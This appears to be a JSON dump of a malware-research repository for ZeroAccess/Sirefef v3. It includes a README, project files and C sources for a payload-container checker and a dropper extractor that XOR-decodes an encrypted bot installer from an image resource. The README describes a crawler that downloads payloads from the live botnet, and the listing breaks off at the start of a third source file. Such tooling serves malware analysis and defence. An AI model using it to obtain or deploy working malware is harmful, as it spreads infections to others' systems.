[
{
"path": "LICENSE.md",
"content": "Copyright (c) 2016 - 2017 ZeroAccess Project\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are met:\n\n* Redistributions of source code must retain the above copyright notice, this\n list of conditions and the following disclaimer.\n\n* Redistributions in binary form must reproduce the above copyright notice,\n this list of conditions and the following disclaimer in the documentation\n and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\nAND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\nIMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\nFOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\nDAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\nSERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\nCAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n"
},
{
"path": "README.md",
"content": "\n# ZeroAccess\n## Toolkit for ZeroAccess/Sirefef v3\n\nZeroAccess is an advanced malware family (probably most advanced from all of available), whose first appearance was in the middle of 2009. Initially Win32 kernel mode rootkit, transformed then into user mode toolkit. Uses self made p2p engine for communication (main purpose - download files). Based on modular structure. Survived multiple takedown attempts (they were mostly serving marketing purposes of various so-called security companies/corporations). Has multiple generations of various toolkit modules. This project provide you insights into ZeroAccess v3 code and several instruments to work with ZeroAccess v3 files. Mostly for education purposes.\n\n# Project Contents\n\n**Umikaze - peer list (@ file) decoder**\n\nProcesses input file as ZeroAccess peer file, type required for correct port assignation. \nResult is output file with Time and IP+Port pairs as text. \n\n> **Usage:** zadecode peerlist_filename [type 32 or 64, default 32], for example: zadecode s32 32\n\n**Shigure - payload decryptor**\n\nProcesses input as ZeroAccess payload container, attempting to decode it using RC4 and extract Microsoft Cabinet afterthat.\n\n> **Usage:** zadecrypt inputfile [outputfile], for example: zadecrypt 80000000.@ out.bin\n\n**Harusame - payload container verificator**\n\nVerifies if given file is valid container for ZeroAccess. Requires EA to be set at input file. More information about verification algorithm can be found in source.\n\n> **Usage:** zacheck inputfile [mode 32 or 64, default 32], for example: zacheck 80000000.@ 32\n\n**Yuudachi - ZeroAccess p2p network crawler**\n\nGUI application that monitors given p2p botnet network and downloads payload from it. Downloaded files contain all required information for further verification by zacheck tool. Dumps collected peers in ZeroAccess format so they can be used as bootstrap next. Use x86-32 version for win32 botnet and x64 for win64. For work required proper bootstrap list and read/write access to current directory.\n\n**Murasame - dropper extractor**\n\nExtracts actual bot installation dropper from encrypted resource of high level dropper.\n\n> **Usage:** zaextract inputfile [outputfile] hexkey, for example: zaextract highlvlbot.bin lowlvlbot.bin 0x12345678\n\n# System Requirements\n\nDoes not require administrative privileges. Some tools may require read/write access for the their directories. Modern compatible NT version required, Windows XP not supported. For best appearance allow zamon32/zamon64 in firewall.\n\n# Build \n\nProject comes with full source code written in C. \nIn order to build from source you need: Microsoft Visual Studio 2015 U1 and later versions.\n \n# Authors\n\n(c) 2016 ZeroAccess Project\n"
},
{
"path": "Source/Harusame/Harusame.vcxproj",
"content": "\n\n \n \n Debug\n Win32\n \n \n Release\n Win32\n \n \n Debug\n x64\n \n \n Release\n x64\n \n \n \n {169C0A78-64AD-4862-A6B6-17E7A3CA9AE3}\n Win32Proj\n Harusame\n 8.1\n \n \n \n Application\n true\n v140\n Unicode\n \n \n Application\n false\n v140\n true\n Unicode\n \n \n Application\n true\n v140\n Unicode\n \n \n Application\n false\n v140\n true\n Unicode\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n SecurityRules.ruleset\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n zacheck32\n SecurityRules.ruleset\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n zacheck64\n \n \n \n \n \n Level4\n Disabled\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n SfMain\n cryptdll.lib;%(AdditionalDependencies)\n \n \n \n \n \n \n Level4\n Disabled\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n SfMain\n cryptdll.lib;%(AdditionalDependencies)\n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n true\n Guard\n \n \n Console\n true\n true\n No\n SfMain\n true\n cryptdll.lib;%(AdditionalDependencies)\n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n true\n Guard\n \n \n Console\n true\n true\n No\n SfMain\n true\n cryptdll.lib;%(AdditionalDependencies)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"path": "Source/Harusame/Harusame.vcxproj.filters",
"content": "\n\n \n \n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\n cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\n \n \n {93995380-89BD-4b04-88EB-625FBE52EBFB}\n h;hh;hpp;hxx;hm;inl;inc;xsd\n \n \n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\n \n \n {ee77c473-79e0-4e59-9cc2-8a1c0f3caaa6}\n \n \n {9ddd8dd9-4aea-4a5a-8649-efbcc9649130}\n \n \n \n \n Source Files\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n minirtl\n \n \n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n Header Files\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n minirtl\n \n \n \n \n Resource Files\n \n \n"
},
{
"path": "Source/Harusame/Harusame.vcxproj.user",
"content": "\n\n \n \n \n WindowsLocalDebugger\n \n \n \n \n WindowsLocalDebugger\n \n \n \n \n WindowsLocalDebugger\n \n \n \n \n WindowsLocalDebugger\n \n"
},
{
"path": "Source/Harusame/main.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016 - 2017\n*\n* TITLE: MAIN.C\n*\n* VERSION: 1.02\n*\n* DATE: 01 Dec 2017\n*\n* Harusame program entry point.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"..\\shared\\global.h\"\n#include \"..\\shared\\cui.h\"\n#include \"..\\shared\\za_rkey.h\"\n\nHANDLE g_ConOut = NULL;\nWCHAR g_BE = 0xFEFF;\nBOOL g_ConsoleOutput = FALSE;\n\n#define T_SFCHECKTTITLE L\"Sirefef/ZeroAccess 3 file checker v1.0 (14/01/16)\"\n#define T_SFCHECKUSAGE L\"Usage: zacheck inputfile [mode 32 or 64, default 32]\\n\\r\\te.g. zacheck in.dll 32\\r\\n\"\n#define T_SFCHECKMODE L\"Wrong mode, possible values 32 or 64\\r\\n\"\n#define T_SFCHECKED L\"File verification SUCCESSFUL \"\n#define T_SFCHECKFAIL L\"File verification FAILED \"\n#define T_SFEAFAILURE L\"File extended attributes missing or incorrect, cannot verify file\"\n#define T_SFPRESSANYKEY L\"\\r\\nPress Enter to exit\"\n\n/*\n* SfProcessCmdLine\n*\n* Purpose:\n*\n* Parse command line and do the job.\n*\n*/\nUINT SfProcessCmdLine(\n LPWSTR lpCommandLine\n)\n{\n ULONG rlen, uMode = 32;\n WCHAR szInputFile[MAX_PATH + 1];\n WCHAR szMode[MAX_PATH + 1];\n NTSTATUS status;\n PBYTE pKey;\n ULONG KeySize;\n\n //path\n rlen = 0;\n RtlSecureZeroMemory(szInputFile, sizeof(szInputFile));\n GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &rlen);\n if (rlen == 0) {\n SfcuiPrintText(g_ConOut,\n T_SFCHECKUSAGE,\n g_ConsoleOutput, FALSE);\n return (UINT)-1;\n }\n\n //type\n rlen = 0;\n RtlSecureZeroMemory(&szMode, sizeof(szMode));\n GetCommandLineParam(lpCommandLine, 2, (LPWSTR)&szMode, MAX_PATH, &rlen);\n if (rlen == 0) {\n uMode = 32;\n }\n else {\n uMode = strtoul(szMode);\n if (uMode != 32 && uMode != 64) {\n\n SfcuiPrintText(g_ConOut,\n T_SFCHECKMODE,\n g_ConsoleOutput, FALSE);\n\n return (UINT)-2;\n }\n }\n\n pKey = (PBYTE)&ZA_key32;\n KeySize = sizeof(ZA_key32);\n\n if (uMode == 64) {\n pKey = (PBYTE)&ZA_key64;\n KeySize = sizeof(ZA_key64);\n }\n\n status = SfcIsFileLegit(szInputFile, pKey, KeySize);\n\n //print result\n SfcuiPrintText(g_ConOut,\n szInputFile,\n g_ConsoleOutput, TRUE);\n\n _strcpy(szMode, TEXT(\"Verification mode: \"));\n ultostr(uMode, _strend(szMode));\n _strcat(szMode, TEXT(\"\\r\\n\"));\n SfcuiPrintText(g_ConOut,\n szMode,\n g_ConsoleOutput, TRUE);\n\n switch (status) {\n\n case STATUS_EA_LIST_INCONSISTENT:\n SfcuiPrintText(g_ConOut,\n T_SFEAFAILURE,\n g_ConsoleOutput, TRUE);\n break;\n\n case STATUS_SUCCESS:\n SfcuiPrintText(g_ConOut,\n T_SFCHECKED,\n g_ConsoleOutput, TRUE);\n break;\n\n default:\n SfcuiPrintText(g_ConOut,\n T_SFCHECKFAIL,\n g_ConsoleOutput, TRUE);\n break;\n }\n\n return (NT_SUCCESS(status));\n}\n\n/*\n* SfMain\n*\n* Purpose:\n*\n* Harusame main.\n*\n*/\nvoid SfMain(\n VOID\n)\n{\n BOOL cond = FALSE;\n UINT uResult = 0;\n DWORD dwTemp;\n HANDLE StdIn;\n INPUT_RECORD inp1;\n\n __security_init_cookie();\n\n do {\n\n if (!SfInitMD5()) {\n uResult = (UINT)-1;\n break;\n }\n\n g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);\n if (g_ConOut == INVALID_HANDLE_VALUE) {\n uResult = (UINT)-2;\n break;\n }\n\n g_ConsoleOutput = TRUE;\n if (!GetConsoleMode(g_ConOut, &dwTemp)) {\n g_ConsoleOutput = FALSE;\n }\n\n SetConsoleTitle(T_SFCHECKTTITLE);\n SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);\n if (g_ConsoleOutput == FALSE) {\n WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dwTemp, NULL);\n }\n\n uResult = SfProcessCmdLine(GetCommandLine());\n\n if (g_ConsoleOutput) {\n\n SfcuiPrintText(g_ConOut,\n T_SFPRESSANYKEY,\n TRUE, FALSE);\n\n StdIn = GetStdHandle(STD_INPUT_HANDLE);\n if (StdIn != INVALID_HANDLE_VALUE) {\n RtlSecureZeroMemory(&inp1, sizeof(inp1));\n ReadConsoleInput(StdIn, &inp1, 1, &dwTemp);\n ReadConsole(StdIn, &g_BE, 1, &dwTemp, NULL);\n }\n }\n\n } while (cond);\n\n ExitProcess(uResult);\n}\n"
},
{
"path": "Source/Harusame/resource.h",
"content": "//{{NO_DEPENDENCIES}}\n// Microsoft Visual C++ generated include file.\n// Used by resource.rc\n\n// Next default values for new objects\n// \n#ifdef APSTUDIO_INVOKED\n#ifndef APSTUDIO_READONLY_SYMBOLS\n#define _APS_NEXT_RESOURCE_VALUE 101\n#define _APS_NEXT_COMMAND_VALUE 40001\n#define _APS_NEXT_CONTROL_VALUE 1001\n#define _APS_NEXT_SYMED_VALUE 101\n#endif\n#endif\n"
},
{
"path": "Source/Murasame/Murasame.vcxproj",
"content": "\n\n \n \n Debug\n Win32\n \n \n Release\n Win32\n \n \n Debug\n x64\n \n \n Release\n x64\n \n \n \n {37B4EC5C-3DEA-49A2-9461-DD33E7D55ED6}\n Win32Proj\n Murasame\n 8.1\n \n \n \n Application\n true\n v140\n Unicode\n \n \n Application\n false\n v140\n true\n Unicode\n \n \n Application\n true\n v140\n Unicode\n \n \n Application\n false\n v140\n true\n Unicode\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n SecurityRules.ruleset\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n zaextract32\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n zaextract64\n \n \n \n \n \n Level3\n Disabled\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n CompileAsC\n \n \n Console\n true\n SfMain\n \n \n \n \n \n \n Level3\n Disabled\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n CompileAsC\n \n \n Console\n true\n SfMain\n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n true\n true\n Guard\n MultiThreaded\n \n \n Console\n true\n true\n No\n SfMain\n true\n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n true\n true\n Guard\n \n \n Console\n true\n true\n No\n SfMain\n true\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"path": "Source/Murasame/Murasame.vcxproj.filters",
"content": "\n\n \n \n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\n cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\n \n \n {93995380-89BD-4b04-88EB-625FBE52EBFB}\n h;hh;hpp;hxx;hm;inl;inc;xsd\n \n \n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\n \n \n {82fc14f9-5afb-45dd-beea-4af99e666148}\n \n \n {b3d76b8d-1725-48df-880b-4b354f769687}\n \n \n \n \n Source Files\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n minirtl\n \n \n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n Header Files\n \n \n minirtl\n \n \n \n \n Resource Files\n \n \n"
},
{
"path": "Source/Murasame/Murasame.vcxproj.user",
"content": "\n\n \n c:\\malware\\test.bin c:\\malware\\ext.bin 0x7744543A\n WindowsLocalDebugger\n \n \n c:\\malware\\test.bin c:\\malware\\ext.bin 0x7744543A\n WindowsLocalDebugger\n \n"
},
{
"path": "Source/Murasame/main.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2016 - 2017\n*\n* TITLE: MAIN.C\n*\n* VERSION: 1.02\n*\n* DATE: 01 Dec 2017\n*\n* Murasame program entry point.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"..\\shared\\global.h\"\n#include \"..\\shared\\cui.h\"\n#include \"..\\shared\\gdip.h\"\n\n#include \n#include \n\n#pragma comment(lib, \"Shlwapi.lib\")\n\nHANDLE g_ConOut = NULL;\nWCHAR g_BE = 0xFEFF;\nBOOL g_ConsoleOutput = FALSE;\n\n#define T_SFEXTRACTTITLE L\"Sirefef/ZeroAccess 3 extractor v1.0 (18/01/16)\"\n#define T_SFEXTRACTUSAGE L\"Usage: zaextract inputfile [outputfile] hexkey\\n\\r\\te.g. zaextract dropper.bin extracted.bin 0x12345678\\r\\n\"\n#define T_SFEXTRACTED L\"File extracted \"\n#define T_SFEXTRACTFAIL L\"\\r\\nError while extracting file\"\n#define T_SFINITFAILED L\"Required GDI+ routines cannot be found\"\n#define T_SFPRESSANYKEY L\"\\r\\nPress Enter to exit\"\n\n/*\n* SfExtractDropper\n*\n* Purpose:\n*\n* Extract Sirefef/ZeroAccess from image resource.\n*\n* CNG variant\n*\n*/\nUINT SfExtractDropper(\n LPWSTR lpCommandLine\n)\n{\n BOOL cond = FALSE, bSuccess = FALSE;\n ULONG c, uKey = 0, imagesz;\n WCHAR szInputFile[MAX_PATH + 1];\n WCHAR szOutputFile[MAX_PATH + 1];\n WCHAR szKey[MAX_PATH];\n PVOID ImageBase = NULL, EncryptedData = NULL, DecryptedData = NULL;\n IStream *pImageStream = NULL;\n ULONG_PTR gdiplusToken = 0;\n GdiplusStartupInput input;\n GdiplusStartupOutput output;\n PVOID BitmapPtr = NULL;\n GdiPlusBitmapData BitmapData;\n GdiPlusRect rect;\n SIZE_T sz;\n PULONG ptr, i_ptr;\n\n //input file\n c = 0;\n RtlSecureZeroMemory(szInputFile, sizeof(szInputFile));\n GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c);\n if (c == 0) {\n SfcuiPrintText(g_ConOut,\n T_SFEXTRACTUSAGE,\n g_ConsoleOutput, FALSE);\n return (UINT)-1;\n }\n\n //output file\n c = 0;\n RtlSecureZeroMemory(&szOutputFile, sizeof(szOutputFile));\n GetCommandLineParam(lpCommandLine, 2, (LPWSTR)&szOutputFile, MAX_PATH, &c);\n if (c == 0) {\n _strcpy(szOutputFile, TEXT(\"extracted.bin\"));\n }\n\n //key\n c = 0;\n RtlSecureZeroMemory(&szKey, sizeof(szKey));\n GetCommandLineParam(lpCommandLine, 3, (LPWSTR)&szKey, MAX_PATH, &c);\n if ((c == 0) || (c > 10)) {\n SfcuiPrintText(g_ConOut,\n T_SFEXTRACTUSAGE,\n g_ConsoleOutput, FALSE);\n return (UINT)-1;\n }\n\n c = 0;\n if (locase_w(szKey[1]) == 'x') {\n c = 2;\n }\n uKey = hextoul(&szKey[c]);\n\n do {\n\n ImageBase = SfuCreateFileMappingNoExec(szInputFile);\n if (ImageBase == NULL)\n break;\n\n c = 0;\n EncryptedData = SfLdrQueryResourceData(1, ImageBase, &c);\n if ((EncryptedData == NULL) || (c == 0))\n break;\n\n pImageStream = SHCreateMemStream((BYTE *)EncryptedData, (UINT)c);\n if (pImageStream == NULL)\n break;\n\n RtlSecureZeroMemory(&input, sizeof(input));\n RtlSecureZeroMemory(&output, sizeof(output));\n input.GdiplusVersion = 1;\n\n if (GdiplusStartup(&gdiplusToken, &input, &output) != GdiplusOk)\n break;\n\n BitmapPtr = NULL;\n if (GdipCreateBitmapFromStream(pImageStream, &BitmapPtr) != GdiplusOk)\n break;\n\n RtlSecureZeroMemory(&rect, sizeof(rect));\n\n if (\n (GdipGetImageWidth(BitmapPtr, (UINT *)&rect.Width) == GdiplusOk) &&\n (GdipGetImageHeight(BitmapPtr, (UINT *)&rect.Height) == GdiplusOk)\n )\n {\n RtlSecureZeroMemory(&BitmapData, sizeof(BitmapData));\n if (GdipBitmapLockBits(BitmapPtr, &rect, ImageLockModeRead, PixelFormat32bppARGB, &BitmapData) == GdiplusOk) {\n\n c = (rect.Width * rect.Height);\n\n imagesz = sizeof(ULONG) * c;\n sz = imagesz;\n DecryptedData = NULL;\n NtAllocateVirtualMemory(NtCurrentProcess(), &DecryptedData, 0, &sz, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n if (DecryptedData) {\n\n i_ptr = (PULONG)BitmapData.Scan0;\n ptr = DecryptedData;\n while (c > 0) {\n *ptr = *i_ptr ^ uKey;\n ptr++;\n i_ptr++;\n c--;\n }\n\n bSuccess = (SfuWriteBufferToFile(szOutputFile, DecryptedData, imagesz, FALSE, FALSE) == imagesz);\n\n sz = 0;\n NtFreeVirtualMemory(NtCurrentProcess(), &DecryptedData, &sz, MEM_RELEASE);\n }\n GdipBitmapUnlockBits(BitmapPtr, &BitmapData);\n }\n }\n\n } while (cond);\n\n if (bSuccess == FALSE) {\n SfcuiPrintText(g_ConOut,\n T_SFEXTRACTFAIL,\n g_ConsoleOutput, FALSE);\n }\n else\n {\n SfcuiPrintText(g_ConOut,\n szOutputFile,\n g_ConsoleOutput, TRUE);\n SfcuiPrintText(g_ConOut,\n T_SFEXTRACTED,\n g_ConsoleOutput, TRUE);\n }\n\n if (BitmapPtr != NULL) {\n GdipDisposeImage(&BitmapPtr);\n }\n\n if (gdiplusToken != 0) {\n GdiplusShutdown(gdiplusToken);\n }\n\n if (pImageStream != NULL) {\n pImageStream->lpVtbl->Release(pImageStream);\n }\n\n if (ImageBase != NULL) {\n NtUnmapViewOfSection(NtCurrentProcess(), ImageBase);\n }\n return 0;\n}\n\n/*\n* SfMain\n*\n* Purpose:\n*\n* Murasame main.\n*\n*/\nvoid SfMain(\n VOID\n)\n{\n BOOL cond = FALSE;\n UINT uResult = 0;\n DWORD dwTemp;\n HANDLE StdIn;\n INPUT_RECORD inp1;\n\n __security_init_cookie();\n\n do {\n\n g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);\n if (g_ConOut == INVALID_HANDLE_VALUE) {\n uResult = (UINT)-1;\n break;\n }\n\n g_ConsoleOutput = TRUE;\n if (!GetConsoleMode(g_ConOut, &dwTemp)) {\n g_ConsoleOutput = FALSE;\n }\n\n SetConsoleTitle(T_SFEXTRACTTITLE);\n SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);\n if (g_ConsoleOutput == FALSE) {\n WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dwTemp, NULL);\n }\n\n if (SfInitGdiPlus()) {\n uResult = SfExtractDropper(GetCommandLine());\n }\n else {\n SfcuiPrintText(g_ConOut,\n T_SFINITFAILED,\n g_ConsoleOutput, FALSE);\n }\n\n if (g_ConsoleOutput) {\n\n SfcuiPrintText(g_ConOut,\n T_SFPRESSANYKEY,\n TRUE, FALSE);\n\n StdIn = GetStdHandle(STD_INPUT_HANDLE);\n if (StdIn != INVALID_HANDLE_VALUE) {\n RtlSecureZeroMemory(&inp1, sizeof(inp1));\n ReadConsoleInput(StdIn, &inp1, 1, &dwTemp);\n ReadConsole(StdIn, &g_BE, 1, &dwTemp, NULL);\n }\n }\n\n } while (cond);\n\n ExitProcess(uResult);\n}\n"
},
{
"path": "Source/Murasame/resource.h",
"content": "//{{NO_DEPENDENCIES}}\n// Microsoft Visual C++ generated include file.\n// Used by resource.rc\n\n// Next default values for new objects\n// \n#ifdef APSTUDIO_INVOKED\n#ifndef APSTUDIO_READONLY_SYMBOLS\n#define _APS_NEXT_RESOURCE_VALUE 101\n#define _APS_NEXT_COMMAND_VALUE 40001\n#define _APS_NEXT_CONTROL_VALUE 1001\n#define _APS_NEXT_SYMED_VALUE 101\n#endif\n#endif\n"
},
{
"path": "Source/Shigure/Shigure.vcxproj",
"content": "\n\n \n \n Debug\n Win32\n \n \n Release\n Win32\n \n \n Debug\n x64\n \n \n Release\n x64\n \n \n \n {77AD1A3E-BA02-4376-976D-BA356F98F32F}\n Win32Proj\n Shigure\n 8.1\n \n \n \n Application\n true\n v140\n Unicode\n \n \n Application\n false\n v140\n true\n Unicode\n \n \n Application\n true\n v140\n Unicode\n \n \n Application\n false\n v140\n true\n Unicode\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n SecurityRules.ruleset\n \n \n true\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n SecurityRules.ruleset\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n SecurityRules.ruleset\n zadecrypt32\n \n \n false\n .\\output\\$(Platform)\\$(Configuration)\\\n .\\output\\$(Platform)\\$(Configuration)\\\n SecurityRules.ruleset\n zadecrypt64\n \n \n \n \n \n Level4\n Disabled\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n CompileAsC\n \n \n Console\n true\n SfMain\n \n \n \n \n \n \n Level4\n Disabled\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n CompileAsC\n \n \n Console\n true\n SfMain\n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n true\n Guard\n CompileAsC\n MultiThreaded\n \n \n Console\n true\n true\n No\n SfMain\n true\n \n \n \n \n Level4\n \n \n MaxSpeed\n true\n true\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n true\n Guard\n CompileAsC\n MultiThreaded\n \n \n Console\n true\n true\n No\n SfMain\n true\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"path": "Source/Shigure/Shigure.vcxproj.filters",
"content": "\n\n \n \n {4FC737F1-C7A5-4376-A066-2A32D752A2FF}\n cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx\n \n \n {93995380-89BD-4b04-88EB-625FBE52EBFB}\n h;hh;hpp;hxx;hm;inl;inc;xsd\n \n \n {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}\n rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms\n \n \n {0b82da90-09b9-424a-b217-d47fbaa87c59}\n \n \n {de1e4bba-d683-4dce-a248-b53266169d63}\n \n \n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n Source Files\n \n \n shared\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n shared\n \n \n minirtl\n \n \n \n \n minirtl\n \n \n minirtl\n \n \n minirtl\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n shared\n \n \n Header Files\n \n \n shared\n \n \n shared\n \n \n minirtl\n \n \n \n \n Resource Files\n \n \n"
},
{
"path": "Source/Shigure/Shigure.vcxproj.user",
"content": "\n\n \n \n \n WindowsLocalDebugger\n \n \n \n \n WindowsLocalDebugger\n \n \n \n \n WindowsLocalDebugger\n \n \n \n \n WindowsLocalDebugger\n \n"
},
{
"path": "Source/Shigure/main.c",
